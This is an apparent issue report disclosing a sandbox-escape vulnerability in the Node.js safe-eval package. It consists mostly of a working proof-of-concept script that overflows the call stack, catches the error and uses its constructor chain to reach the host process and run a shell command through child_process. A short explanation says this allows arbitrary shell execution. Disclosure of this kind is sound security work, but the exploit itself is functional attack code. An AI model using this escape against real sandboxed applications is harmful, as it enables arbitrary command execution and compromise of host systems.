Open
Description
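```js
// node version: 19.8.1
const safeEval = require('safe-eval')

// Code string handed to the sandbox.
const code = `
(function() {
  // Unbounded recursion that reads Error().stack on every frame
  // until the call stack overflows.
  function stack() {
    new Error().stack;
    stack();
  }
  try {
    stack();
  } catch (pp) {
    // The caught error's constructor chain yields a Function constructor
    // that returns the host process object.
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
  }
})()
`
safeEval(code);
```

The sandbox can be escaped by prototype pollution by calling the error stack during a maximum call stack error.
Also, this escape bug can allow the attacker to execute arbitrary shell code using the process module.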